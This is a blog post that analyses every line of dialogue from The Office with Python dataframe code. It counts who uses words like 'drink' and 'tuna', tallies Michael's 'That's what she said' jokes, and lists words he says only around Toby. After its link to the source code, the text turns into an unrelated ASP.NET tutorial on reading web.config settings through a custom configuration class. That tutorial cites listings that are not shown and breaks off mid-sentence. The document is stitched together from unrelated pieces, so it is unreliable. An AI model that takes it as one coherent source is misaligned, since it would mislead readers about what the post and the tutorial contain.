Refresh button on your browser. After a couple of refreshes the values should automatically refresh with the new values. Summary Creating a configuration class has a lot of benefits when compared to just using the Application object by itself. The ability to have an IntelliSense listing of properties, automatic reload of values when the web.config file changes and having typed properties are just some of the advantages. While using this method requires a little more setup work, the payoff is well worth the effort.
https://www.codemag.com/Article/0209081/ASP.NET-Creating-an-Application-Configuration-Class
CC-MAIN-2020-10
refinedweb
1,440
57.37
. The load() function provides us with a very easy way to get HTML data from the server into our application but sometimes we need to be more flexible.By flexible I mean to get JSON , XML data from the server.We can get this type of data from the server using the get() and post() methods. 1) Launch Visual Studio 2010. I am using the ultimate edition but the express edition will do just fine. Create an ASP.Net web application and choose C# as the development language.Give your application an appropriate name 2) We will show how to get html data from the server using the get() method as we did in my other post using the load() method. Add another item to your application, an html page. Name it LoadHtmlFromServerGet.html . This is going to be a very simple page <body> <h1>Load HTML Content from the Server using JQuery</h1> <br /> <button id="niceButton"> Click here to load HTML from the Server using the Get method!!!! </button> <div id="maindiv"></div> </body> 3) Add another item to your project, an html page. I have named mine jqueryintro.htm.The html markup for my html page is following <body> <div>jQuery is a fast and concise JavaScript Library that simplifies HTML document traversing,event handling, animating, and Ajax interactions for rapid web development. <strong> jQuery is designed to change the way that you write JavaScript.</strong> </div> <div id="new"> <p><h3>Download jQuery</h3> This is the recommended version of jQuery to use for your application. The code in here should be stable and usable in all modern browsers. </p> </div> </body> 4) I want to load the contents of the jqueryintro.htm in the "maindiv" ID, when the user clicks the button.I will do that by using the get() JQuery Ajax function.We will use this function to make a request to the server. 5) We have to add the following javascript/jquery code to the head section of the LoadHtmlFromServerGet.html <script src="Scripts/jquery-1.4.1.min.js" type="text/javascript"></script> <script type="text/javascript"> $(document).ready(function () { $('#niceButton').click(function () { $.get('jqueryintro.htm', function (data) { $('#maindiv').html(data); }); }); }); </script> This is very similar with the load() method.As you can see the get method does not operate on a wrapped set from a selector.It cannot directly update the matched set. It uses a callback function to do that. View the page on the browser and click the button to get the data from the server. 8) Now let's have a look on how you can access and get data from a web service.Add a new html page to your application,Loadfromwebservice.htm. I will pass some parameters/data from this html page to a web service method and get results back. The markup for this page <body> <div id="livfootballers"> <a href="#">kenny</a> <a href="#">steven</a> </div> <div id="results"></div> </body> Add a folder in your project. Name it "thefootballers". Inside there i have place two .htm files. I have called the first one kenny.htm and the second one steven.htm. The content inside this pages is simple html kenny.htm <body> <p> Kenneth Mathieson "Kenny" Dalglish..... </p> </body> steven.htm <body> <p> Steven Gerrard is..... </p> </body> The web service method when invoked from the client will get the data from the .htm files and incorporate in the calling html page. 9) Add a new item on your application , a web service. Name it AjaxJquery.asmx Make sure you uncomment this line of code. [System.Web.Script.Services.ScriptService] I am going to have to create a new method that takes some data from the client page and then sends back data from the relevant .htm page that resides on the server. The code for the method follows [WebMethod] public string FootBallerData() { string thefootballer = this.Context.Request["footballer"]; if (thefootballer == "") return string.Empty; string file = Server.MapPath("~/thefootballers/" + thefootballer + ".htm"); StreamReader sr = File.OpenText(file); string contents = sr.ReadToEnd(); return contents; } I am storing the data I got from the client side in a variable and then find the .htm file based on that parameter and finally I load the contents of that file in a variable. 10) Now we have to write some javascript code in our Loadfromwebservice.htm page. I will use the get and post utility methods to send data to the appropriate service method. Inside the <head> section of the page, I type the following: <script src="Scripts/jquery-1.5.js" type="text/javascript"></script> <script type="text/javascript"> // get method $(function () { $('#livfootballers a').click(function (e) { $.get( 'AjaxJquery.asmx/FootBallerData', { footballer: $(this).text() }, function (response) { $('#results').html($(response).text()); } ); return false; }); }); // post method $(function () { $('#livfootballers a').click(function (e) { 'AjaxJquery.asmx/FootBallerData', 'footballer=' + $(this).text(), function (response) { $('#results').html($(response).text()); } ); return false; }); }); </script> Both methods work equally well.you can comment out one if you want and just use the other one. 11) View the page on the browser and click the links. By doing that you pass the web service that is hosted on the server a parameter (kenny or steven).Then we take the response back from the service and by using the html() method we attach the returned html content to the div with ID results. 12) Let's see now how we can get different type of data from the server and not just html. We can get back JSON data and incorporate it to our html page. Add a new item in your application , a class file. Name it Footballer.cs public class Footballer { public int ID { get; set; } public string FirstName { get; set; } public string LastName { get; set; } } Add a new item in your project , a web form. Name it Footballers.aspx. The code inside the Footballers.aspx.cs file follows public partial class Footballers : System.Web.UI.Page { protected void Page_Load(object sender, EventArgs e) { Response.ContentType = "application/json"; var footballer = new Footballer { ID = int.Parse(Request["id"]), FirstName = "Kenny", LastName = "Dalglish" }; var serial = new DataContractJsonSerializer(typeof(Footballer)); serial.WriteObject(Response.OutputStream, footballer); } } In the Page_Load event handling routine we construct in memory an object of type Footballer.Then I serialize the object to JSON data. For the folks that do not know what JSON is and why we use it to exchange data among systems have a look here. Now we need to create another html page. We add a new page to our application and I will name it GetJSON.html The markup for the page is very easy <body> <button id="JsonButton">Click here to get Json</button> <div id="results"></div> </body> Inside the <head> section of the GetJSON.html, I will write the following javascript code. I am using the getJSON method. <script type="text/javascript"> $(document).ready(function () { $('#JsonButton').click(function () { $.getJSON('Footballers.aspx', { id: 2 }, function (data) { alert('ID: ' + data.ID + ' ' + data.FirstName + ' ' + data.LastName); }); }); }); </script> View the page in the browser and click the button. You will pass the ID (id =2) from the client to the server and back to the client. You have placed in the alert box a JSON object. 13) Now I would like to move one and create a simple example using the ajax() method.We can use this method if we want to have full control over making Ajax calls to the server. Add another web form to your application, name it GetFootballteams.aspx We will use the ajax() method to get the data from a web service and bring it back to the client. The markup follows <head> <title>Football Teams</title> <script src="Scripts/jquery-1.5.js" type="text/javascript"></script> <style type="text/css"> #result { display: none; } </style> <script type="text/javascript"> $(function () { $('#buttonTeam').click(function () { $.ajax({ type: "POST", url: "FootballService.asmx/GetTeams", data: "{}", contentType: "application/json; charset=utf-8", dataType: "json", success: function (response) { $('#result').html('') .append('<p>Here are the teams:</p><ul id="teamsList">'); var teams = response.d; for (var i = 0; i < teams.length; i++) { $('#teamsList').append('<li>' + teams[i].Name + ' football club, resides on ' + teams[i].City + ' and was established on, ' + teams[i].Created + '</li>'); } $('#result').css('display', 'block'); } }); }); }); </script> </head> <body> <h1>Football Teams</h1> <button type="button" id="buttonTeam">Get Teams</button> <div id="result"></div> </body> Let me explain what I am doing here.I wire up the click even to the button. $('#buttonTeam').click(function () { .... Then I call the GetTeams method from the service.I am going to use a POST call to the server.The content that it sends back is JSON. Then I append some text to the div result. success: function (response) { $('#result').html('') .append('<p>Here are the teams:</p><ul id="teamsList">'); .......... Then I loop through this set of teams by using the response.d property. Then I append each item and their respective properties in the teamList item I created above. var teams = response.d; for (var i = 0; i < teams.length; i++) { $('#teamsList').append('<li>' + teams[i].Name + ' football club, resides on ' + teams[i].City + ' and was established on, ' + teams[i].Created + '</li>'); } I am sure you can see how much more power and flexibility we have with the ajax() method. Now we must create the web service. 14) Add another item to your project, a web service. Name it FootballService.asmx The code inside is public class FootballTeam { public string Name { get; set; } public string City { get; set; } public short Created { get; set; } } List<FootballTeam> FootballTeams = new List<FootballTeam> { new FootballTeam{Name = "Liverpool", City = "Liverpool", Created = 1892}, new FootballTeam{Name = "Everton", City = "Liverpool", Created = 1878}, new FootballTeam{Name = "Man Utd", City = "Manchester", Created = 1878}, new FootballTeam{Name = "Arsenal", City = "London", Created = 1886}, new FootballTeam{Name = "Tottenham", City = "London", Created = 1882} }; [WebMethod] public List<FootballTeam> GetTeams() { return FootballTeams; } } It is very easy to understand what I am doing in the web service. I have a method GetTeams that return a generic .Net list object, FootballTeams to the client .Before that I create a FootballTeam class and then instantiate a list object FootballTeams. View the page in the browser and click the button. You will get all the JSON data back from the service. Have a look the the picture below and see the JSON objects returned in the response. Well, I am sure you will agree with me when I say that noone has any doubts why Microsoft was so keen on incorporating/embracing the JQuery library into their products. Microsoft favors JQuery over Ajax Javascript library because of its huge power Hope it helps!!!!! Email me if you need the source code. HI, I need more example using ajax Get method Hi, I'm new in this ajax and I'm try so do my firt example and I'm not able to execute one example and seems that your post is very interessant can you please send your solution? Thanks, joao lopes
http://weblogs.asp.net/dotnetstories/archive/2011/09/14/using-jquery-ajax-functions-to-retrieve-data-from-the-server.aspx
CC-MAIN-2014-10
refinedweb
1,831
68.26
I'm obviously a total newb, and I'm probably making a rookie mistake, but this one seems obviously right to me, and behaves obviously wrong. I completed the brickshooter assignment and was annoyed that you could fly the camera completely out of the environment. So I modified the controller to enforce some min and max bounds in X and Y. It works solidly in Y, but in X when I touch a bound, I get shot off into infinity. Then I notice I had rotated the camera 180 degrees in Y earlier, and when I faced it back forward, everything works as I expect (except I can't see the acutal game =o)). So it's some sign error and I'm thinking about camera's in 3D (or just Unity) wrong or something. What would be the more correct way to do what I'm trying to do here? public class CameraController : MonoBehaviour { public Transform ShotPosition; public Rigidbody Projectile; public float ShotForce = 1000f; public float MoveSpeed = 10f; private float minX = -6f; private float maxX = 6f; private float minY = 0.5f; private float maxY = 7f; void Update () { float h = Input.GetAxis("Horizontal") * Time.deltaTime * MoveSpeed; float v = Input.GetAxis("Vertical") * Time.deltaTime * MoveSpeed; float x = transform.position.x + h; float y = transform.position.y + v; x = Mathf.Min(x, maxX); x = Mathf.Max(x, minX); y = Mathf.Min(y, maxY); y = Mathf.Max(y, minY); Vector3 moveTo = new Vector3(x, y, transform.position.z); transform.Translate(moveTo - transform.position); if(Input.GetButtonUp("Fire1")) { Rigidbody shot = Instantiate(Projectile, ShotPosition.position, ShotPosition.rotation) as Rigidbody; shot.AddForce(ShotPosition.forward * ShotForce); } } } Answer by aldonaletto · May 18, 2013 at 05:47 PM Maybe the error is due to Translate - its default is local space, thus the camera may go in the wrong direction when its rotation isn't zero. You could simplify your code and solve the problem modifying it as follows: ... void Update () { float h = Input.GetAxis("Horizontal") * Time.deltaTime * MoveSpeed; float v = Input.GetAxis("Vertical") * Time.deltaTime * MoveSpeed; Vector3 curPos = transform.position; // get the current position // calculate new position and clamp it to the limits curPos.x = Mathf.Clamp(curPos.x + h, minX, maxX); curPos.y = Mathf.Clamp(curPos.y + v, minY, maxY); transform.position = curPos; // update camera position if(Input.GetButtonUp("Fire1")) { Rigidbody shot = Instantiate(Projectile, ShotPosition.position, ShotPosition.rotation) as Rigidbody; shot.AddForce(ShotPosition.forward * ShotForce); } } Works great. For some reason I had it in my head that I couldn't set position directly. Great tips, keep an object within the camera view? 2 Answers Smooth Camera follow script is causing framerate drops when moving 1 Answer 3D / Top-Down - Make a script to let the player zoom the camera in and out 0 Answers Dark Souls like camera going through walls, please help 0 Answers Help me to avoid the camera to discover the world boundary 1 Answer
https://answers.unity.com/questions/459042/brickshooter-tutorial-bounding-camera-movement.html
CC-MAIN-2020-29
refinedweb
480
50.73
I searched the threads for help, but I'm not sure my terminology is correct. I'm a C++ hobbyist, and have a question about maintaining a list of objects, created dynamically at run time, and how to interact with those objects. I'd like to maybe use a vector, and some pointers, but I can't get it together. This is my first post. I've gotten it to work without the vector and list ideas where it just used 4 statically created class instances. I know it's a lot of code, but basically - all I want to do is maintain a vector of pointers (I think) to Monster objects created with new. I think. Any help is awesome, even a link to something or anything. I'm studying Accelerated C++ (Koenig, Moo) but it's complicated for me - the going is slow. Here's the class: Here's the class implementation:Here's the class implementation:Code:#ifndef MONSTER_H #define MONSTER_H #include <string> using namespace std; extern int monster_number; class Monster { public: Monster(string n = "Unknown", int hp = 500, int ap = 1000, int spd = 1000); virtual ~Monster(); void report(); string myname(); private: string name; int max_health; int cur_health; int atk_pwr; int speed; }; #endif // MONSTER_H And the main program:And the main program:Code:#include "Monster.h" #include <iostream> using namespace std; Monster::Monster(string n, int hp, int ap, int spd) { monster_number++; cout << "Monster #" << monster_number << " Born!" << endl; name = n; max_health = hp; cur_health = hp; atk_pwr = ap; speed = spd; monster_pool.push_back(this); // This fails horribly } Monster::~Monster() { cout << "Monster #" << monster_number << " Killed!" << endl; monster_number--; } void Monster::report() { cout << endl; cout << "Name: " << name << endl; cout << " Hp: " << cur_health << "/" << max_health << endl; cout << " Attack Power: " << atk_pwr << " Speed: " << speed << endl; } string Monster::myname() { return name; } Code:#include <iostream> #include <vector> #include <cctype> #include "Monster.h" using namespace std; int monster_number = 0; vector<Monster> monster_pool; int main() { //vector<Monster> monster_pool; Monster Dragon( "Red Dragon", 5500, 450, 130 ); Monster Goblin( "Goblin", 45, 65, 55 ); Monster Orc( "Orc", 95, 135, 75 ); Monster Worg( "Worg", 65, 125, 90 ); //monster_pool.push_back(Goblin); //monster_pool.push_back(Orc); //monster_pool.push_back(Worg); bool Running = true; char choice = '?'; while( Running ) { cout << endl; cout << "Monster Menu" << endl; cout << "(S)pawn a monster" << endl; cout << "(K)ill a monster" << endl; cout << "(L)ist all monsters" << endl; cout << "(Q)uit" << endl; cout << "Choice? "; cin >> choice; switch( toupper( choice ) ) { case 'S': cout << endl; cout << "Spawn Monster" << endl; cout << "-------------" << endl; cout << "(D)ragon" << endl; cout << "(G)oblin" << endl; cout << "(O)rc" << endl; cout << "(W)org" << endl; cout << "Spawn which type? "; // cin >> choice; // Monsters.spawn(choice); //Monster *m+monster_number; break; case 'K': cout << endl; cout << "Kill which monster?" << endl; cout << "-------------------" << endl; // Monsters.list(); cin >> choice; // Monsters.kill(choice); break; case 'L': cout << endl; cout << "Monster List:" << endl; cout << "-------------" << endl; // Monsters.list(); break; case 'Q': Running = false; break; default: break; } } cout << endl << "Ending with " << monster_number << " monsters in the wild!" << endl; if( monster_number == 0 ) cout << "You killed all the monsters, hero." << endl; else cout << "I will slay them..." << endl << endl; return 0; }
https://cboard.cprogramming.com/cplusplus-programming/138440-keeping-dynamic-object-list-referencing-them.html
CC-MAIN-2018-05
refinedweb
499
62.48
TurboGears has a minimum of required configuration. It does need to know where your database lives if you’re not using sqlite. If you are using sqlite, the database is configured by default and you don’t need to do anything. If you’re not, the configuration is quite simple. The quickstart command has created two config files, one for ‘dev’elopment and one for ‘prod’uction. The config files are are more-or-less the same format as the .ini files used by windows apps, check the configuration reference for a full listing of configuration options and settings. For information on how to install alternative database support and set up the connection. Since we are doing development, load up dev.cfg in your favorite editor, uncomment the sqlalchemy.dburi line that corresponds to your database and modify the values to match your environment. You’ll also want to comment out the sqlite line. You’ll also probably want to create a new database so that our wiki tables don’t muck up one of your other projects. With all that done, restart the web server by hitting Control-C and running the startup script again: python start-wiki20.py From here on, you’ll only have to restart the server when you make a change to the configuration. When in development mode, CherryPy detects when you save a file in your project and automatically reloads itself with the new code. This may take a few seconds, so if you’re quick about saving, flipping to your browser, and reloading, you can get a “server not found” error in your browser. Since we’ve created, in Python code, the schema for our simple database and we’ve also told TurboGears where to look for the database, we’re ready to actually create our tables: tg-admin sql create This command searches through your model and creates all the tables currently missing from the database. For our Page model, this will result in the following SQL being executed on the database: CREATE TABLE page ( pagename VARCHAR(30) NOT NULL, data VARCHAR, PRIMARY KEY (pagename) ) Hard to believe it, but we’re already ready to start displaying pages. The first step is to rename our template. welcome.html just won’t do. Rename the template using whatever commands do the trick for your operating system: cd wiki20/templates mv welcome.html page.html cd ../.. Now, let’s replace the body of the template with something more reasonable for a wiki page: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" ""> <html xmlns="" xmlns: <xi:include <head> <meta content="text/html; charset=utf-8" http- <title> ${page.pagename} - 20 Minute Wiki </title> </head> <body> <div class="main_content"> <div style="float:right; width: 10em"> Viewing <span py:Page Name Goes Here</span> <br/> You can return to the <a href="/">FrontPage</a>. </div> <div py:Page text goes here.</div> </div> </body> </html> Notice that you can open the page.html file directly in your web browser, and it is still perfectly viewable. It also doesn’t add wonky directive markers, so it’ll pass cleanly through most current WYSIWYG editors. This can be convenient when you’re working with others who insist on using such editors. This template is using two Genshi replacement methods, the first is the expression substitution syntax ${var}. The Python code inside (yes, real Python code, not some weird template language) is evaluated and the result replaces the expression. The second is the py:replace attribute, which replaces the tag contents with the result of the expression. Both these will escape the results to ensure you produce valid HTML. The Markup() function tells Genshi not to escape the contents of the data variable. So, where do these page and data variables come from? Both are items in the dictionary returned by your controller. Or they will be when we add them... TurboGears greatly reduces the amount of boilerplate code you need to write, but it does not eliminate it. We need to hook up our Page class in our model and the template we just created. This is done in your controller, which is found in wiki20/controllers.py. We’ll replace the old index method with one that does something more interesting that grabbing the current time. from turbogears import controllers, expose, flash from turbogears import redirect, url from wiki20.model import Page from docutils.core import publish_parts class Root(controllers.RootController): @expose('wiki20.templates.page') #1 def index(self , pagename='FrontPage'): #2 page = Page.query.get(pagename) #3 content = publish_parts(page.data, writer_name='html')['html_body'] #4 return dict(data=content, page=page) #5 That’s a lot of changes! Let’s break it down. The first few changes are imports. We first pull in the turbogears package, which we’ll make use of later. Next we pull in the Page from our model into our controller. The last change is our wiki parser. What? You didn’t think we were going to write a structured text parser, did you? The Python community has a wide range of useful modules outside of TurboGears and there is no sense in not making use of them. As for the rest, the changes are: .htmlextension. (line 1) pagenameparameter to our method with a default pagename of "FrontPage"(line 2) pagenameas the primary key. Convenient, eh? (line 3) dataas HTML (line 4) pageand dataitems. Notice the keys correspond to the variable names in our template. (line 5) All that in six, very readable lines. The dictionary that we’re returning at the end provides the data that populates the template and will be reused for other, more exotic purposes a bit later. The code is in place... Point your browser to and let’s see what we’ve got! Oh, we’ve got an error. Since we’re in development mode, CherryPy gives us the whole traceback, which is very convenient. The traceback is telling us that we got a exception: AttributeError: 'NoneType' object has no attribute 'data' D’oh! We forgot to put a page in the database! Let’s do something about that. Go back to page 1 | Continue on page 3
http://www.turbogears.org/1.5/docs/Wiki20/Page2.html
CC-MAIN-2016-22
refinedweb
1,033
66.23
So I have an assignment that involves creating a tail to find the last K lines in a file. We have been given a buffer to use for this. For now I'm trying to write small things and search for "\n" characters within a file. I am running into a few problems. In python my code spits back 6 and in python3 its a 0. The text file has WAY more than this though. Can someone please tell me why this isn't working as I would like? def new(): try: f = open("test.txt", "r") count = 0 for i in f: if i == "\n": count = count + 1 return count f.close() except(FileNotFoundError): print("No file") for i in f: isn't doing what you think it is. The default iterator for a file gives you lines, not characters. So you're saying "Does the entire line equal just a return?" Try instead doing if i[-1] == "\n": as this says "Is the last character in the line a newline?" You might notice that this is trivially true, as each "line" is ended by a newline, so simply counting the lines is sufficient. If you want to iterate through the individual characters, I would do: for line in file: for char in line: dostuff() Naming the variables what you think they are will also help to troubleshoot if they end up not being what you thought.
https://codedump.io/share/S73UwT8jhDwA/1/finding-new-line-characters-in-a-text-file
CC-MAIN-2017-39
refinedweb
238
81.43
"Peter O'Gorman" <address@hidden> writes: > In sort.c's check function there is a variable named nonunique, which is > declared as type bool. The code later does a compare: > if (<bool,true> <= (int)-1) error > xlc decided that the comparison was true. The solution is to declare > nonunique as an int type. I've looked into the bool problem some more, and have found the following trouble reports with respect to the way gnulib currently handles _Bool and <stdbool.h>: Some HP-UX C compilers mishandle _Bool (internal compiler error), independently of whether <stdbool.h> works. E.g., <>, <>. IBM C compiler mishandles sign-extension when combining _Bool with int. E.g., <>. I installed this patch into coreutils in an attempt to work around all these problems. I'll also suggest a similar patch to gnulib. 2005-11-25 Paul Eggert <address@hidden> * lib/Makefile.am (stdbool.h): Just copy stdbool_.h; no need to sed any more. * lib/stdbool_.h: Simplify greatly, under the assumption that these days most people use C99-compatible compilers to debug, so it's not worth worrying about catering to older compilers for that. This works around some porting problems with HP-UX compilers. (false, true) [defined __BEOS__]: Don't #undef; no longer needed. (_Bool): typedef to bool if C++ or BeOS, and #define to signed char otherwise. * m4/stdbool.m4 (AM_STDBOOL_H): Don't bother substituting HAVE__BOOL; no longer needed. (gl_STDBOOL_H): New macro, from gnulib. (AC_HEADER_STDBOOL): Sync with gnulib. Index: lib/Makefile.am =================================================================== RCS file: /fetish/cu/lib/Makefile.am,v retrieving revision 1.236 retrieving revision 1.239 diff -p -u -r1.236 -r1.239 --- lib/Makefile.am 24 Nov 2005 06:48:55 -0000 1.236 +++ lib/Makefile.am 26 Nov 2005 06:58:34 -0000 1.239 @@ -123,11 +123,11 @@ CLEANFILES += charset.alias ref-add.sed BUILT_SOURCES += $(STDBOOL_H) EXTRA_DIST += stdbool_.h -MOSTLYCLEANFILES += stdbool.h stdbool.ht +MOSTLYCLEANFILES += stdbool.h stdbool.h-t # Create stdbool.h on systems that lack a working one. stdbool.h: stdbool_.h - sed -e 's/@''HAVE__BOOL''@/$(HAVE__BOOL)/g' $(srcdir)/stdbool_.h > address@hidden - mv address@hidden $@ + cp $(srcdir)/stdbool_.h address@hidden + mv address@hidden $@ BUILT_SOURCES += $(ALLOCA_H) EXTRA_DIST += alloca_.h Index: lib/stdbool_.h =================================================================== RCS file: /fetish/cu/lib/stdbool_.h,v retrieving revision 1.5 retrieving revision 1.6 diff -p -u -r1.5 -r1.6 --- lib/stdbool_.h 14 May 2005 07:58:07 -0000 1.5 +++ lib/stdbool_.h 26 Nov 2005 06:37:31 -0000 1.6 @@ -1,4 +1,4 @@ -/* Copyright (C) 2001, 2002, 2003 Free Software Foundation, Inc. +/* Copyright (C) 2001, 2002, 2003, 2005 Free Software Foundation, Inc. Written by Bruno Haible <address@hidden>, 2001. This program is free software; you can redistribute it and/or modify @@ -54,35 +54,45 @@ /* 7.16. Boolean type and values */ /* BeOS <sys/socket.h> already #defines false 0, true 1. We use the same - definitions below, but temporarily we have to #undef them. */ + definitions below, which is OK. */ +/* C++ and BeOS have a reliable _Bool. address@hidden@ -#__ typedef bool _Bool; +#else +# define _Bool signed char #endif + #define bool _Bool /* The other macros must be usable in preprocessor directives. */ Index: m4/stdbool.m4 =================================================================== RCS file: /fetish/cu/m4/stdbool.m4,v retrieving revision 1.6 diff -p -u -r1.6 stdbool.m4 --- m4/stdbool.m4 7 Oct 2005 18:53:20 -0000 1.6 +++ m4/stdbool.m4 26 Nov 2005 07:00:33 -0000 @@ -11,7 +11,7 @@ AC_DEFUN([AM_STDBOOL_H], [ AC_REQUIRE([AC_HEADER_STDBOOL]) - # Define two additional variables used in the Makefile substitution. + # Define an additional variable used in the Makefile substitution. if test "$ac_cv_header_stdbool_h" = yes; then STDBOOL_H='' @@ -19,15 +19,11 @@ AC_DEFUN([AM_STDBOOL_H],. @@ -79,7 +75,7 @@ AC_DEFUN([AC_HEADER_STDBOOL], reject this program, as the initializer for xlcbug is not one of the forms that C requires support for. However, doing the test right would require a run-time - test, and that would make crosss-compilation harder. + test, and that would make cross-compilation harder. Let us hope that IBM fixes the xlc bug, and also adds support for this kind of constant expression. In the meantime, this test will reject xlc, which is OK, since @@ -87,10 +83,15 @@ AC_DEFUN([AC_HEADER_STDBOOL], char digs[] = "0123456789"; int xlcbug = 1 / (&(digs + 5)[-2 + (bool) 1] == &digs[4] ? 1 : -1); #endif + _Bool q = true; + _Bool *pq = &q; ], [ - return (!a + !b + !c + !d + !e + !f + !g + !h + !i + !j + !k + !l - + !m + !n + !o + !p); + ])])
http://lists.gnu.org/archive/html/bug-coreutils/2005-11/msg00268.html
crawl-003
refinedweb
736
62.14
Visual Studio 2010: Visualizing dependencies Visual Studio 2010 introduces new and cool feature – architecture diagrams that visualize dependencies between assemblies, namespaces and classes. In this posting I will show you how these diagrams look like and provide some explanations about how to read them. I tested architecture diagrams (or should I say dependency diagrams?) with one of my small projects. Okay, I tried to visualize dependencies found in source code of KiGG too but it was too big for current implementation of dependency visualizer. But for smaller projects it works pretty well. You can find these diagrams from Architecture menu of Visual Studio 2010. Assembly dependencies As a first thing I generated dependency diagram for assemblies. There is one main dll and it is related to violet block labeled as Generics. Blue block is my assemby and generics block shows all the generics I am using. Externals block is for external assemblies and on the following screenshot it is expanded so you can see other assemblies on what my own assembly one depends. Visual Studio 2010: Assembly dependencies diagram. Click on image to view it at original size. Namespace dependencies Namespace dependencies diagram illustrates dependecies between namespaces. Also here you can see Generics and Externals boxes. Purpose of them is same as before. On the following screenshot you can see class dependencies in my project. Bookmarks2LiveWriter box is expanded and it contains classes in this namespace. Class ExceptionBox is also expanded and you can see how method dependencies are visualized. Visual Studio 2010: Namespace dependencies diagram. Click on image to view it at original size. Class dependencies Class dependencies diagram illustrates dependencies between classes. As on previous diagrams you can see also on this diagram the lines with different thickness between classes. Thickness of line gives you some idea about how dependent one class is of another. Thicker line means heavier dependency. Direction on line shows what class is using what other class. Visual Studio 2010: class dependencies diagram. Click on image to view it at original size. Custom dependencies You can also generate custom dependency diagrams that illustrate things ust like you want. The result is something like you can see on screenshots above. Only new thing is dialog that lets you specify what you can see on diagram. You can see this dialog on right and if it is too small for you then please click on it to see it at original size. Right are in this dialog is reserved for example diagram. If you change the state of check boxes you can see on example how generated diagram looks like. After clicking Ok custom architecture diagram will be generated. Matrix View It is possible to view dependencies also as matrix. You can see dependencies matrix on following screenshot. You can see that I have disabled some options in legend – it is because otherwise matrix will be very large. Visual Studio 2010: Matrix view of dependencies. Click on image to view it at original size. Conclusion Dependency diagrams are very useful tools when you analyze dependencies between different components in your system. Less dependencies mean usually less problems because changing one part of system causes less changes to other parts of system. I think these diagrams are good addition to code analysis reports because sometimes one picture can tell more than 1000 words. Currently dependency diagrams are generated pretty slowly. But I hope it will me much faster when first stable version of Visual Studio 2010 hits the streets. Currently you can save diagrams as XPS files and it also possible to copy diagram or legend to clipboard as image. It is pretty easy to take those diagrams and make them part of your project documents.
http://weblogs.asp.net/gunnarpeipman/visual-studio-2010-visualizing-dependencies
CC-MAIN-2014-42
refinedweb
619
58.08
RAII based class to acquire and release schema meta data locks. More... #include <dd_schema.h> RAII based class to acquire and release schema meta data locks. When an instance of this class is created, and 'ensure_lock()' is called, it will acquire an IX lock on the submitted schema name, unless we already have one. When the instance goes out of scope or is deleted, the ticket registered will be released. Release the MDL ticket, if any, when the instance of this class leaves scope or is deleted. Make sure we have an IX meta data lock on the schema name. If the circumstances indicate that we need a meta data lock, and we do not already have one, then an IX meta data lock is acquired.
https://dev.mysql.com/doc/dev/mysql-server/latest/classdd_1_1Schema__MDL__locker.html
CC-MAIN-2020-05
refinedweb
126
78.69
JoSQL is like that. But before we get into why, there's one thing that should be cleared up. Despite the name, JoSQL isn't a database server, or a toolkit for database access via JDBC, or anything like that. It's an engine that gives you to access your in-memory objects using SQL. Now, while that doesn't have the mass market appeal of blogs, to a developer it is such an amazingly useful tool that after using it, you'll wonder how high-level computing languages such as C# or Java have been around so long without this facility. To recap: It's an engine that allows you to use SQL syntax to access your in-memory objects, so, you could, for example, do something like this: SELECT * from com.devx.mywidgets WHERE text='hello' SELECT * from com.devx.mywidgets WHERE text='hello' Think about how useful this can be to your applications. What if you want to skin an application by setting the color property of all your labels to one color and your panels to another color? You can run a query, pull your labels, set their color, run another query, pull your panels, and set their color. Very simple. Alternatively, how about an application that has a number of objects in memory that represent connected clients, such as what you might find in a chat server? To perform a function such as, 'Find all clients on my server that are administrators and send them the message x,' you would have to iterate through each client, check its permissioning bits, and if they match the administrative patterns, you send them the message. JoSQL may not be more efficient than this, but it does make your code a lot cleaner. In the following sections I'll walk you through some examples showing how it works and how it can be used in such a scenario. Getting Started with JoSQL JoSQL is an open source project that may be downloaded here. At this site, you'll also find some documentation and examples of how to use it. I found these examples to be a little too light and too high level, leaving you with a lot of figuring left to do (albeit with the aid of the excellent JavaDocs). Despite this, if you use a good IDE that has auto-complete then you can generally figure out a lot of the API for yourself. To get started, download the JoSQL package and copy the JARS to a library directory. There are two JARs that you need: the JoSQL one (presently called JoSQL1-1.jar) and a third-party dependency called gentlyWeb utilities (gentlyWEB-utils-1.1.jar). Then, from your Java code, add an import to reference JoSQL like this: import org.josql.*; Please enable Javascript in your browser, before you post the comment! Now Javascript is disabled. Your name/nickname Your email WebSite Subject (Maximum characters: 1200). You have 1200 characters left.
http://www.devx.com/dbzone/Article/30291
CC-MAIN-2016-18
refinedweb
496
70.13
What this article covers Service-oriented architecture (SOA) is about provided and used services. Service providers and consumers are commonly called participants. A service provider publishes descriptions of services and provides the implementation of the services. Service consumers depend on the descriptions to build service clients to invoke and consume the services. Therefore, designing the services in a proper way is important and of a high priority to the success of any SOA project. There are three main values provided by modeling web services with UML: - The first value is to abstract away any unnecessary details, such as the syntax of the Web Services Description Language (WSDL) and XML Schema Definition (XSD) and focus on the main structures of the web services, including data types in the XML schema, the operations in the web service interface, and the binding of that interface to a protocol and end point. - The second value is to provide a standard way, which is a UML model, to communicate the design of the web service to both the business stakeholders and the technical team in the SOA project. Communicating the design of the web service through WSDL and XSD files to business stakeholders is not easy, especially when the number of the web services increases. - The third value is to better manage and easily express the relationship between web services WSDL and XSD, such as in the composite services that combine two or more services. These three values will be illustrated in the example presented in the article. The idea of having a modeling language for describing services has been realized since introducing the Software Services Unified Modeling Language (UML) 2.0 profile. This profile is deprecated now and replaced by Service-Oriented Architecture Modeling Language (SoaML) UML profile. It is an Object Management Group (OMG) standard that describes a UML profile and metamodel for the specification and design of services within the SOA. That profile is used in this article to design the web service interface (WSDL). The other profile used in this article is the XSD transformation UML profile, which provides stereotypes and properties for UML constructs to be generated into XML schema components. SoaML has been supported in IBM® Rational® Software Architect for WebSphere® Software since Version 7.5.4. The example in this article is developed with Version 7.5.5. This software provides a rich set of tools and model templates for designing services artifacts using SoaML. This article shows the main steps to design a web service, along with its XML message schema, using XSD and SoaML transformation profiles: - Common schema definition design - XML schema definition design - Service specification or service interface definition design - Service binding design - Transformation configuration - Model transformation into WSDL and XSD. First, we'll introduce the example that is used to explain and apply the idea in the article. Government SOA example in this article A government wants to employ a government service bus that publishes services provided by some governmental agencies. These services are available to be consumed by other governmental agencies. Figure 1 shows a diagram for the example. Figure 1. Government SOA example The government has a common schema that is shared by all governmental agencies. Each government agency could be a provider of a service and a consumer of another service. Generic names are used in the example to avoid any accidental similarities with real names. Each governmental agency provides one service and has one XML schema. For simplicity, the example will cover creating one service with its XML schemas and a common schema, as well. We will start with building an empty structure of the project. We assume that the agency has a subsystem on which the web service will be built. The web service is assumed to expose one functionality of this subsystem. 